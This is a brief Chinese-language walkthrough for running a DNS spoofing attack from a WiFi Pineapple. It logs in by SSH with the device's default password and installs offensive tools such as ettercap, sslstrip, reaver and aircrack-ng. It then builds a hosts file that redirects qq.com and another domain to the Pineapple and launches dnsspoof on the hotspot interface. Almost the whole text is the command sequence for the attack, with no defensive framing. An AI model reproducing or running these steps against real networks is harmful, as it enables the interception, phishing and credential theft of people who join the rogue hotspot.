wifipineapple执行dnsspoof
ssh连接到wifipineapple:
输入连接信息:ssh root@172.16.42.1
输入密码:pineapplesareyummy
安装依赖基本环境:
opkg update
opkg install nan
opkg install htop
opkg install bash
opkg install netcat
opkg install tar
opkg install openssh-sftp-client
opkg install nmap
opkg install tcpdump
opkg install aircrack-ng
opkg install kismet-client
opkg install kismet-server
opkg install nbtscan
opkg install snort
opkg install karma
opkg install samba36-client
opkg install elinks
opkg install yafc
opkg install python
opkg install uhttpd
opkg install at
opkg install ethtool
opkg install ettercap
opkg install macchanger
opkg install netstat-nat
opkg install reaver
opkg install sslsniff
opkg install sslstrip
opkg install wget
opkg install wput
opkg install curl
opkg install libnids
opkg install php5
opkg install php5-cgi
使用ifconfig命令,查看热点网卡端口为br-lan
在当前目录下创建一个hosts的文件, 当用户访问指定的域名,全部会被重定向到pineapple的服务器
172.16.42.1 qq.com 172.16.42.1 it.com
执行dns欺骗
dnsspoof -i br-lan -f hosts
天道酬勤